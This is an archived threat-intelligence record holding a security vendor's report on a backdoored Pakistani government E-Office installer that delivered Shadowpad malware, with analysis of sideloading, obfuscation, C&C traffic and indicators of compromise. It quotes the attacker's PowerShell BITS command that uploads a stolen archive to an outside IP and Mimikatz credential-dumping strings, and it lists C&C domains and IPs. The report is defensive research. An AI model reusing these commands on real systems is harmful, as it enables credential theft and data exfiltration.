{ "id": "9d5cb316-96d7-4db8-98cc-6d0ab22a0833", "created_at": "2026-04-06T00:09:19.813043Z", "updated_at": "2026-04-10T03:36:48.423785Z", "deleted_at": null, "sha1_hash": "6a20cb5969a28df564f267d3604acaf0be156a18", "title": "Possible Supply Chain Attack Targeting Pakistani Government Delivers Shadowpad", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 786369, "plain_text": "Possible Supply Chain Attack Targeting Pakistani Government Delivers\r\nShadowpad\r\nBy By: Daniel Lunghi Jul 14, 2023 Read time: 11 min (2941 words)\r\nPublished: 2023-07-14 · Archived: 2026-04-05 13:54:32 UTC\r\nUpdate: As of July 17, the Pakistani government agency in question has found no compromise of its build environment. As\r\nthe MSI installer file is not signed, we cannot remove the possibility that the threat actor obtained the legitimate installer\r\nand modified it to add the malicious files found in our analysis, and that users were lured to run this Trojanized version via\r\nsocial engineering attacks. They are currently carrying out a detailed forensic analysis of their systems to thoroughly\r\ninvestigate this incident.\r\nHowever, we also note that the legitimate installer was not publicly available at the time of the incident (late September\r\n2022). In addition, two different entities were compromised two days apart in this incident.\r\nWe recently found that an MSI installer of the Pakistani government app E-Office delivered a Shadowpad sample,\r\nsuggesting a possible supply-chain attack.\r\nShadowpad is an advanced malware family that was discovered in 2017 after a supply-chain attack on a popular piece of\r\nserver management software attributed to APT41. Since 2019, this malware has been shared among multiple Chinese threat\r\nactors such as Earth Akhlut or Earth Lusca.\r\nThe sample that was delivered implemented an updated version of the obfuscation technique discussed by PTSecurity in\r\nJanuary 2021.\r\nMSI installer analysis\r\nThe MSI installer’s metadata contains tags mentioning the eOffice and its developing agency.\r\nFigure 1. MSI installer file properties\r\nE-Office is described as \"helping the government departments to go paperless. It is aimed at improving internal efficiencies\r\nin an organization through electronic administration.” This description suggests that E-Office is only delivered to\r\ngovernment organizations. After some research, we learned that this piece of software is intended for government entities\r\nonly and is not publicly available, which enforces our belief that the incident could be a supply-chain attack.\r\nThree files were added to the legitimate MSI installer:\r\nTelerik.Windows.Data.Validation.dll\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 1 of 9\n\nmscoree.dll\r\nmscoree.dll.dat\r\nTelerik.Windows.Data.Validation.dll is a 64-bit non-DLL PE executable file, which turns out to be the legitimate\r\napplaunch.exe file signed by Microsoft. This executable is known to be abused by multiple threat actors to sideload\r\nmalicious files named mscoree.dll.\r\nMeanwhile, mscoree.dll is a malicious DLL that decrypts and loads the mscoree.dll.dat file, which is the Shadowpad\r\npayload.\r\nThe MSI installer has a custom action named “TelerikValidation” with type 3170 that runs the file\r\nTelerik.Windows.Data.Validation.dll without any parameter from the installation folder.\r\nFigure 2. MSI CustomAction table\r\nThe value type of 3170 is the sum of the following values:\r\n34: EXE file with a path referencing a directory\r\n3072: Queues for execution at schedule point within script and executes with no user impersonation; runs in system\r\ncontext\r\n64: A synchronous execution that ignores exit code and continues\r\nThis TelerikValidation custom action is listed in the InstallExecuteSequence and is launched after installing the files but\r\nbefore creating the shortcuts and registry keys.\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 2 of 9\n\nFigure 3. MSI InstallExecuteSequence table\r\nNow let us analyze the piece of malware delivered by the backdoored MSI installer.\r\nShadowpad analysis\r\nThe applaunch.exe file copied to the E-Office folder is a legitimate file signed by Microsoft. As aforementioned, this version\r\nis known to be vulnerable to a DLL sideloading vulnerability. Any file named mscoree.dll is copied in the same directory as\r\napplaunch.exe, which will be loaded in memory, and the export named “IEE” will be called. This behavior has been abused\r\nfor many years by threat actors to sideload malicious DLLs.\r\nWhen looking at the code of the IEE export, we notice that the threat actor checks some bytes of the loading executable at a\r\nhard-coded offset to verify that they match a particular value. If this is not the case, the DLL closes itself. This code excerpt\r\nis intended as an anti-sandbox analysis code, where it is a common practice to run DLLs via rundll32.exe or similar\r\nlaunchers instead of the legitimate yet vulnerable executable.\r\nAfter that check, the rest of the code is obfuscated.\r\nDLL and payload obfuscation\r\nWe noticed two different obfuscation techniques, both of which are used in the DLL and the decrypted payload.\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 3 of 9\n\nThe first technique prevents the disassembler from statically following the code flow, as every instruction is followed by a\r\ncall to a function that calculates the address of the next instruction. The disassembler gets lost and does not decode the\r\nproper instructions, making static analysis extremely difficult.\r\nThis technique is an evolution of what PTSecurity first described in 2021, where the same function was called after each\r\ninstruction to jump to the next instruction.\r\nIn this updated version, the called function is always different. Where the previous version read four bytes following the\r\n“call” instruction, the updated version performs an additional operation (ADD, SUB, or XOR) between the gathered value\r\nand a fixed value that changes in every function. The calculated value is pushed to the stack and the application calls the\r\nRET instruction to redirect the code flow to the calculated address.\r\nFigure 4. Code flow obfuscation\r\nIn Figure 5, for example, the four bytes encircled in red are read by the calc_addr_next_instruction_1 function. Afterward,\r\nan additional operation is performed on the resulting value using XOR with a hard-coded value specific to this function. The\r\nresult is then added to the value encircled in yellow to get the address of the next instruction. Hundreds of similar functions\r\nexist within the code of the DLL or the payload.\r\nThe second technique does not obfuscate the code flow. Instead, it adds useless instructions and branches that are never\r\ntaken. Within the code, thousands of comparisons between a register value and a zero followed by conditional branching are\r\nperformed. As the register value is never null, the related branch is never taken, filling the disassembled code with useless\r\ncomparisons and dead code, which proves burdensome for analysts.\r\nWe managed to find multiple samples using these two obfuscation techniques. The oldest one we found was uploaded to\r\nVirusTotal in late February 2022. However, we did not find it in our telemetry, nor were we able to identify the threat actor\r\nbehind this file.\r\nConfiguration file\r\nThe configuration file is available in memory only, in an encrypted form.\r\nFigure 5. First part of the encrypted configuration\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 4 of 9\n\nFigure 6. Second part of the encrypted configuration (truncated)\r\nWe detail the simplified structure here:\r\nFour-byte configuration header (boxed in red)\r\nList of the offsets of encrypted items offsets (boxed in yellow), with two bytes per offset\r\nIP addresses of DNS servers (in this case, 8.8.8.8, 8.8.4.4, 4.4.4.4 and 4.2.2.2, boxed in green)\r\nEncrypted items:For every encrypted item, a two-byte encryption key (boxed in pink), and the encrypted item itself\r\n(boxed in blue)\r\nIt is important to note that the encryption scheme is different from what we saw in previous Shadowpad versions.\r\nHistorically, the encryption of the Shadowpad configuration was a custom algorithm, with different threat actors using\r\ndifferent algorithms or constants.\r\nIn this case, each Shadowpad sample that we found encrypted its configuration file with the same algorithm:\r\nA base encryption of 16 bytes concatenated with two bytes (boxed in pink in Figure 7) that are different for each item\r\nof the configuration file\r\nhe calculated MD5 of the 18 bytes obtained in the aforementioned\r\nThe calculated MD5 passed to the CryptDeriveKey function, which returns 16 bytes based on that input\r\nThose 16 bytes used as an AES-CBC 128-bit encryption key, with 16 zero bytes as initialization vector\r\nA variant of this encryption scheme was documented by PwC in a report from December 2021.\r\nThe oldest sample we found using this encryption scheme was uploaded to VirusTotal in March 2021. However, we did not\r\nfind it in our telemetry, nor were we able to identify the threat actor behind this file.\r\nIf we decrypt the different items of the configuration file, we can find multiple pieces of information, including the\r\nfollowing:\r\nFile paths and file names\r\nRegistry keys used for persistence\r\nService names and description\r\nFull paths to processes to inject to\r\nList of command-and-control (C\u0026C) servers\r\nList of proxies\r\n List of DNS servers\r\nUser agents and other HTTP headers\r\nA campaign note\r\nIt should be noted that any field can be empty.\r\nThe following are the different “campaign notes” that we found in the samples related to this threat actor:\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 5 of 9\n\nCampaign\r\nnote\r\nComment\r\n0908_0908 Probably related to the date of the campaign that took place on September 8, 2022\r\nREVER-0512\r\nProbably related to the date of the campaign that took place on May 12, 2022\r\n20220215 Probably related to the campaign that took place on February 15, 2022\r\n1114 Probably related to the campaign on November 11, which likely took place in 2021\r\ncsp.live.obo\r\n“live” and “obo” are probably references to the C\u0026C servers found in the configuration\r\nlive.musicweb[.]xyz and obo.videocenter[.]org), while “csp” might mean “communications service\r\nprovider”\r\nPivots on the obfuscation and encryption schemes\r\nAs aforementioned, we used obfuscation techniques and encryption scheme analysis to pivot and find related samples. In\r\ntotal, we found 11 Shadowpad loaders and six payloads related to this threat actor. Furthermore, we found 25 additional\r\nShadowpad loaders and five additional payloads that we could not link with strong confidence to this threat actor.\r\nAmong these samples, nine different encryption keys were used. We learned that two of them are related to our threat actor,\r\nwhile we have no strong attribution for the seven remaining keys. As Shadowpad has been known to be a shared backdoor\r\nsince at least 2019, it is likely that other threat actors also have access to this updated version.\r\nOn three samples sharing one of the seven remaining encryption keys, we noticed how specific profiles hosted on the\r\nsocial.msdn.microsoft.com domain were used as dead drop resolvers (DDR) to get the final C\u0026C server. Notably, APT41 has\r\nused this technique in the past. However, all the involved profile pages were offline, so we could not retrieve the final C\u0026C\r\nserver nor confirm the APT41 attribution.\r\nNetwork stealth\r\nWhen first analyzing the malicious MSI installer, we noticed a TCP connection to the IP address 10.2.101.110 on port\r\n50000. After analyzing the Shadowpad malware sample, we confirmed that it was indeed the C\u0026C IP address and port set in\r\nthe configuration.\r\nHowever, we also noticed that running a clean E-Office version also provoked connections to the same IP and port. After a\r\nmore thorough investigation involving SSL stripping, a man-in the-middle (MitM) attack, we discovered that the legitimate\r\nE-Office application makes a GET request to hxxps://10.2.101.110:50000/VI/Application/CheckForApplicationUpdate/1\r\nwith some custom HTTP headers such as “Sender: eOffice.Client.WPF”, “machine_name”, “app_version”, or “os_type”,\r\nwhile the malware makes a POST request to hxxps://10.2.101.110:50000/5BE96B824C4AD5A.\r\nFigure 7. Legitimate network connection by E-Office application\r\nWe did not search further, as the URL is self-explanatory. It is likely that the legitimate E-Office application connects to this\r\nIP address and port to search for updates. It also seems very unlikely that every Pakistani government organization that\r\ndeploys E-Office has the same network mapping. However, we do not know if the address of the update server can be\r\nconfigured or if it was unintentionally left as a debug feature from the developers.\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 6 of 9\n\nIn all cases, it was clever for the attackers to use an IP address that is hard-coded in a legitimate application used by their\r\ntargets.\r\nOn the defender’s side, we recommend searching for POST requests to the IP address 10.2.101.110 on port 50000, as the\r\nlegitimate application seems to send GET requests. It is also noticeable that in the case of a malicious installer, the\r\nconnection happens right after launching the installation process, while in the case of a clean installer, the connection is only\r\ntriggered after running the E-Office application.\r\nTargets\r\nWe found three targets within our telemetry, all located in Pakistan; two are from the government/public sector and are\r\noriented toward finance, while one is from a telecommunications provider.\r\nThe first victim we found was a Pakistan government entity, and we could confirm that the Shadowpad sample landed on the\r\nvictim after executing the backdoored E-Office installer analyzed in a previous section. The infection took place on\r\nSeptember 28, 2022.\r\nThe second victim was a Pakistani public sector bank. In this incident, different Shadowpad samples were detected on\r\nSeptember 30, 2022 after E-Office was installed. We could not retrieve the related E-Office installer.\r\nOther related Shadowpad samples were detected at a Pakistani telecommunications provider in May 2022. Later analysis\r\nshowed that one of them had been there since mid-February 2022. We were unable to find the infection vector for this\r\nincident.\r\nPost-exploitation and data exfiltration\r\nWithin our telemetry, we noticed that the attacker used a portable Mimikatz variant the day following the appearance of a\r\nShadowpad sample. Although we could not confirm it because we did not have access to the file, we found traces of strings\r\nprivilege::debug followed by:sekurlsa::logonpasswords, which looks like the Mimikatz sekurlsa plug-in that dumps LSASS\r\nsecrets.\r\nFour days after that, we found traces of data exfiltration. The threat actor used a very simple PowerShell command that\r\nrelies on Background Intelligent Transfer Service (BITS).\r\npowershell  -nop -exec bypass \"\"import-module bitstransfer;start-bitstransfer -source c:\\windows\\help\\1019.rar -destination\r\nhttp://158.247.230.255/1019.rar -transfertype upload””\r\nWe could not retrieve the exfiltrated file. However, by looking at OSINT sources, we learned that the threat actor likely had\r\ncontrol over that IP address from late April 2022 to late October 2022.\r\nAttribution\r\nWe did not find enough evidence to attribute this attack to a known threat actor.\r\nAs mentioned earlier, since Shadowpad is a shared malware family, we cannot rely on it to attribute the attack to a particular\r\nthreat actor.\r\nOf two out of three victims of this campaign, we could not find any further malware samples or tactics, techniques, and\r\nprocedures (TTPs) that could be helpful for the attribution of the campaign. In the third victim’s environment, however, we\r\nfound multiple malware families that we analyzed in our search for links to known threat actors.\r\nNotably, we found one dropper described by PTSecurity and by Dr. Web (under the name “Trojan.Misisc.1”) that we could\r\nattribute with high confidence to the Calypso threat actor. The payload was a simple keylogger.\r\nAnother malware sample that we found turned out to be what PTSecurity describes as Deed RAT in the report on the Space\r\nPirates threat actor. Our analysis shows that rather than a new malware family, it is likely that this is a Shadowpad variant\r\nobfuscated differently and using a different encryption scheme. We claim with low confidence that this piece of malware\r\nalso belongs to the Calypso threat actor toolkit.\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 7 of 9\n\nThe last malware family that we found belongs to the DriftingCloud threat actor. As far as we know, DriftingCloud is not\r\nknown to use Windows malware. Additionally, we found the same sample targeting a totally different location and industry,\r\nenforcing our opinion that this sample is probably unrelated to the threat actor.\r\nUnfortunately, we could not find any clear links between these pieces of malware and the Shadowpad samples related to our\r\nthreat actor. Therefore, we prefer to refrain from making any uncertain attribution claim.\r\nBronze University Shadowpad sample\r\nIn February 2022, Dell SecureWorks wrote a report on Shadowpad, in which multiple threat actors are described as using\r\nthis malware family. In the list of indicators of compromise (IOC), we noticed that the payload\r\n253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 uses the new encryption scheme that we\r\ndescribed previously, with a base encryption key that we attribute to our threat actor. The related C\u0026C domain names are\r\nlive[.]musicweb[.]xyz and obo[.]videocenter[.]org. Kaspersky lists those domain names in a report mentioning targets in the\r\nindustrial and telecommunications sectors in both Pakistan and Afghanistan, but do not include strong attribution links.\r\nDell SecureWorks attributes this sample to Bronze University, which matches the threat actor we call Earth Lusca.\r\nHowever, we question this attribution. All the other Shadowpad samples attributed to Bronze University in the IOC list are\r\nnamed log.dll.dat, while our payload is named iviewers.dll.dat. Moreover, none of those samples uses the new encryption\r\nscheme that we described previously. In fact, they use the old encryption scheme described by PwC, using the 0x107e666d\r\nconstant. Finally, the C\u0026C domain names of the 253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1\r\npayload do not match the usual Earth Lusca registration pattern that we know of.\r\nThus, we prefer to refrain from attributing this whole attack to Earth Lusca. However, we will be happy to correct our\r\nassessment in the future if we have further proof of the links between this campaign and Earth Lusca.\r\nConclusion\r\nFrom what we have seen so far, this whole campaign was the result of a very capable threat actor that managed to retrieve\r\nand modify the installer of a governmental application to compromise at least three sensitive targets.\r\nThe fact that the threat actor has access to a recent version of Shadowpad potentially links it to the nexus of Chinese threat\r\nactors, although we cannot point to a particular group with confidence. However, we managed to show how the Shadowpad\r\nauthors continue to update their piece of malware, making its reverse engineering more difficult. Finally, we detailed how\r\nthis threat actor carefully chose one of its C\u0026C addresses to blend in with the legitimate network traffic, which shows great\r\npreparation capability.\r\nWe expect to see more threat actors using this updated Shadowpad version in the future.\r\nIndicators of Compromise (IOCs)\r\nSHA256 Detection name\r\nMalwa\r\nfamily\r\nc1feef03663a9aa920a9ab4eb2ab7adadb3f2a60db23a90e5fe9b949d4ec22b6 Backdoor.Win64.SHADOWPAD.AS\r\nBackd\r\neOffic\r\ninstall\r\n4e3a455e7f0b8f34385cd8320022719a8fc59d8bc091472990ac9a56e982a965 Backdoor.Win64.SHADOWPAD.AS\r\nShado\r\nloader\r\n17272a56cbf8e479c085e88fe22243685fac2bc041bda26554aa716287714466 Backdoor.Win64.SHADOWPAD.AS.enc\r\nShado\r\nloader\r\nc35b8514e3b2649e17c13fd9dc4796dbc52e38e054d518556c82e6df38ca4c1b Backdoor.Win64.SHADOWPAD.AS\r\nShado\r\nloader\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 8 of 9\n\nd6f184dae03d4ddae8e839dd2161d9cd03d3b25421b4795edab0f5ad9850d091 Backdoor.Win64.SHADOWPAD.AS\r\nShado\r\nloader\r\nf8c5feaae3f8e4bfb37edf4e05d1ee91797023bdf71e1c45ed2711861b300f37  \r\nShado\r\nloader\r\n0122734490fe4dfb287d34394667d81ab46e0d05d4569d06a41f0f3c3a36448c Possible_SMPOPPINGBEEZBJF-A\r\nShado\r\nloader\r\nbdc6a2985a07ef3c5d2ef2a0eb53afdfdbf757bfa080e8b77ba4b47c1a99b423 Trojan.Win64.POPPINGBEE.ZBJF\r\nShado\r\nloader\r\n4805a7a386fac1af9a80ab24d95ebf4699c35a7c38fcf3eefa571b9d67d7bf45 Backdoor.Win64.POPPINGBEE.ZAJF.enc\r\nShado\r\npayloa\r\n8b5e918595c27db3bcafd59a86045605837bc5843c938039852218d72cf2c253 Backdoor.Win64.POPPINGBEE.ZAJF.enc\r\nShado\r\npayloa\r\n953e3ed35d84c4a7c4a599f65b2fbd6475b474e9b4bf85581255f1d81d2b5e4e Backdoor.Win64.SHADOWPAD.AS.enc\r\nShado\r\npayloa\r\n6dea7f976a3dc359e630ab5e85fa69f114fc046dcc363598e998e1ef9751bbed Backdoor.Win64.SHADOWPAD.AS\r\nShado\r\nloader\r\n0122734490fe4dfb287d34394667d81ab46e0d05d4569d06a41f0f3c3a36448c Possible_SMPOPPINGBEEZBJF-A\r\nShado\r\nloader\r\n7e8c6961a10c95a5d97aece92c2e2d974d63ede98196413cc0cf033f92084f53 Possible_SMPOPPINGBEEZBJF-A\r\nShado\r\nloader\r\ndde04eaac96964e86b8734f67f3b6741505fdc5e177dd58e85da12a8120a44bf Possible_SMPOPPINGBEEZBJF-A\r\nShado\r\nloader\r\n16c6558634759e6efd4581de60cc2050d99a53245c6abde3d38fc140204777e9 Backdoor.Win64.SHADOWPAD.AS\r\nShado\r\nloader\r\n253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 Backdoor.Win64.SHADOWPAD.AS.enc\r\nShado\r\npayloa\r\n05ed1feda4a1684f8f7907644500948f4488a60ecb0740f708e08c1812b7f122 Backdoor.Win64.SHADOWPAD.AS.enc\r\nShado\r\npayloa\r\n225b0adce4fab783d0962852894482e7452e5483bf955757cb25e6a26c3d3b38 Trojan.Win64.POPPINGBEE.A  \r\nC\u0026C\r\nHTTPS://tech.learningstudy.xyz:443\r\nHTTPS://live.musicweb.xyz:443\r\nHTTPS://obo.videocenter.org:443\r\nHTTPS://45.76.144.182:443\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html" ], "report_names": [ "supply-chain-attack-targeting-pakistani-government-delivers-shad.html" ], "threat_actors": [ { "id": "536ca49a-2666-4005-8a50-e552fc7e16ef", "created_at": "2023-11-21T02:00:07.375813Z", "updated_at": "2026-04-10T02:00:03.471967Z", "deleted_at": null, "main_name": "Webworm", "aliases": [ "Space Pirates" ], "source_name": "MISPGALAXY:Webworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c42fe131-a81c-45bb-8f32-61f39263a7d4", "created_at": "2023-11-17T02:00:07.60084Z", "updated_at": "2026-04-10T02:00:03.45671Z", "deleted_at": null, "main_name": "DriftingCloud", "aliases": [], "source_name": "MISPGALAXY:DriftingCloud", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "58db0213-4872-41fe-8a76-a7014d816c73", "created_at": "2023-01-06T13:46:38.61757Z", "updated_at": "2026-04-10T02:00:03.040816Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "G0131", "PLA Unit 65017", "Earth Akhlut", "TAG-74", "CactusPete", "KARMA PANDA", "BRONZE HUNTLEY", "Red Beifang" ], "source_name": "MISPGALAXY:Tonto Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "da483338-e479-4d74-a6dd-1fb09343fd07", "created_at": "2022-10-25T15:50:23.698197Z", "updated_at": "2026-04-10T02:00:05.355597Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Tonto Team", "Earth Akhlut", "BRONZE HUNTLEY", "CactusPete", "Karma Panda" ], "source_name": "MITRE:Tonto Team", "tools": [ "Mimikatz", "Bisonal", "ShadowPad", "LaZagne", "NBTscan", "gsecdump" ], "source_id": "MITRE", "reports": null }, { "id": "17d16126-35d7-4c59-88a5-0b48e755e80f", "created_at": "2025-08-07T02:03:24.622109Z", "updated_at": "2026-04-10T02:00:03.726126Z", "deleted_at": null, "main_name": "BRONZE HUNTLEY", "aliases": [ "CactusPete ", "Earth Akhlut ", "Karma Panda ", "Red Beifang", "Tonto Team" ], "source_name": "Secureworks:BRONZE HUNTLEY", "tools": [ "Bisonal", "RatN", "Royal Road", "ShadowPad" ], "source_id": "Secureworks", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a", "created_at": "2022-10-25T16:07:24.332084Z", "updated_at": "2026-04-10T02:00:04.940672Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Bronze Huntley", "CactusPete", "Earth Akhlut", "G0131", "HartBeat", "Karma Panda", "LoneRanger", "Operation Bitter Biscuit", "TAG-74", "Tonto Team" ], "source_name": "ETDA:Tonto Team", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Bioazih", "Bisonal", "CONIME", "Dexbia", "Korlia", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "POISONPLUG.SHADOW", "RoyalRoad", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "3c5b0e7e-2388-4b63-9b97-6b027bec4bf7", "created_at": "2023-01-06T13:46:39.068694Z", "updated_at": "2026-04-10T02:00:03.202867Z", "deleted_at": null, "main_name": "Calypso", "aliases": [ "BRONZE MEDLEY" ], "source_name": "MISPGALAXY:Calypso", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8e385d36-06a2-4294-b3d3-01fe8e9d95f4", "created_at": "2022-10-25T16:07:24.219051Z", "updated_at": "2026-04-10T02:00:04.902017Z", "deleted_at": null, "main_name": "Space Pirates", "aliases": [ "Erudite Mogwai", "Webworm" ], "source_name": "ETDA:Space Pirates", "tools": [ "9002 RAT", "Agent.dhwf", "AngryRebel", "BH_A006", "Chymine", "Darkmoon", "Deed RAT", "Destroy RAT", "DestroyRAT", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "Homux", "Hydraq", "Kaba", "Korplug", "McRAT", "MdmBot", "Moudour", "MyKLoadClient", "Mydoor", "PCRat", "PCShare", "POISONPLUG.SHADOW", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SnappyBee", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "XShellGhost", "Xamtrav", "Zupdax", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "13d9c5fc-af82-4474-90dd-188c4e40a399", "created_at": "2022-10-25T16:07:23.435079Z", "updated_at": "2026-04-10T02:00:04.601572Z", "deleted_at": null, "main_name": "Calypso", "aliases": [ "Bronze Medley" ], "source_name": "ETDA:Calypso", "tools": [ "Agent.dhwf", "Byeby", "Calypso RAT", "DCSync", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EternalBlue", "EternalRomance", "FlyingDutchman", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "NBTscan", "OS_Check_445", "PlugX", "Quarks PwDump", "RedDelta", "SAMRID", "Sogu", "SysInternals", "TCP Port Scanner", "TIGERPLUG", "TVT", "Thoper", "Whitebird", "Xamtrav", "ZXPortMap", "nbtscan", "netcat" ], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434159, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.pdf", "text": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.txt", "img": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.jpg" } }